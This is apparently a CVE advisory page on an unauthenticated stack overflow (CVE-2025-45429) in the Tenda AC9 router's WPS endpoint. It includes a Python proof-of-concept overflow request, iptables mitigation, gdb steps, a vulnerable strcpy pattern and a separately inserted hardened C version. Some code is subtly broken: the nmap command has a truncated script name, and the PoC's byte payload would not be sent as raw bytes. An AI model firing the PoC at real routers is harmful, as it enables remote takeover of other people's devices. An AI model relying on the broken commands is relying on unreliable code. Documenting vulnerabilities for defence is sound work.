How the CVE Works:
The CVE-2025-45429 vulnerability exists in Tenda AC9 routers (v1.0) running firmware V15.03.05.14_multi. The stack overflow occurs in the `/goform/WifiWpsStart` endpoint when processing overly long input strings. Attackers can craft malicious HTTP POST requests with oversized parameters that exceed the buffer capacity, overwriting adjacent memory regions. This allows remote code execution by carefully manipulating the return address or function pointers on the stack. The vulnerability doesn’t require authentication, making it particularly dangerous as it can be exploited from the WAN interface.
DailyCVE Form:
Platform: Tenda AC9 Router
Version: V15.03.05.14_multi
Vulnerability: Stack Overflow
Severity: Critical
Date: 04/23/2025
What Undercode Say:
```python
# Exploit PoC (for educational purposes only)
import requests

target = "http://192.168.0.1/goform/WifiWpsStart"
payload = "A" * 1024 + "\xde\xad\xbe\xef"  # Overflow buffer + controlled EIP
response = requests.post(target, data={"wps_enable": payload})
print(response.status_code)
```
Protection commands:
```bash
# Temporary mitigation (block access to vulnerable endpoint)
iptables -A INPUT -p tcp --dport 80 -m string --string "/goform/WifiWpsStart" --algo bm -j DROP

# Firmware update check
curl -s http://www.tendacn.com/en/security/ | grep AC9
```
Memory analysis commands:
```bash
# Crash analysis on router
gdb -q /usr/bin/httpd core.dump
# Then, at the (gdb) prompt:
info registers
x/20x $sp
```
Vulnerable code pattern:
```c
// Vulnerable function example
void handleWpsStart() {
    char buffer[BUF_SIZE]; // Fixed-size buffer (BUF_SIZE is a placeholder; the actual size is not given)
    strcpy(buffer, get_param("wps_enable")); // Unsafe copy: no length check
}
```
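A hardened counterpart to the pattern above, as an added example that is not Tenda's firmware code or part of the original page: the parameter is length-checked before the copy and oversized input is rejected rather than truncated. `WPS_PARAM_MAX`, `copy_param_checked`, `handle_wps_start_safe` and the stubbed `get_param` are assumptions for illustration.

```c
#include <stdio.h>
#include <string.h>

/* Assumed limit for illustration; the page does not give the real buffer size. */
#define WPS_PARAM_MAX 64

/* Constructed stand-in for the firmware's parameter lookup (hypothetical). */
static const char *g_fake_value;
static const char *get_param(const char *name) { (void)name; return g_fake_value; }

/* Copy src into dst only if it fits including the NUL terminator.
 * Returns 0 on success, -1 if src is NULL or too long. On failure dst is
 * left as an empty string, so no partial (truncated) value is ever used. */
static int copy_param_checked(char *dst, size_t dst_size, const char *src) {
    if (dst == NULL || dst_size == 0)
        return -1;
    dst[0] = '\0';
    if (src == NULL)
        return -1;
    /* Look for the terminator within the first dst_size bytes only. */
    const char *end = memchr(src, '\0', dst_size);
    if (end == NULL)
        return -1;                      /* too long: reject, do not truncate */
    memcpy(dst, src, (size_t)(end - src) + 1);
    return 0;
}

/* Hardened handler: returns the accepted value's length, or -1 to refuse. */
int handle_wps_start_safe(void) {
    char buffer[WPS_PARAM_MAX];
    if (copy_param_checked(buffer, sizeof buffer, get_param("wps_enable")) != 0)
        return -1;                      /* caller answers with an error */
    return (int)strlen(buffer);
}

int main(void) {
    char oversized[1029];               /* constructed oversized input */
    memset(oversized, 'A', sizeof oversized - 1);
    oversized[sizeof oversized - 1] = '\0';

    g_fake_value = "1";
    printf("short value  -> %d\n", handle_wps_start_safe());
    g_fake_value = oversized;
    printf("1028 bytes   -> %d\n", handle_wps_start_safe());
    return 0;
}
```

Rejecting instead of truncating keeps a cut-off value from being processed as if it were valid.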
Patch verification:
```bash
# Check patched version
strings /usr/bin/httpd | grep "15.03.05.15"
md5sum /usr/bin/httpd
```
Network detection:
```bash
# Identify vulnerable devices
nmap -p80 --script http- -sV 192.168.0.0/24 | grep "Tenda AC9"
```
Sources:
Reported By: nvd.nist.gov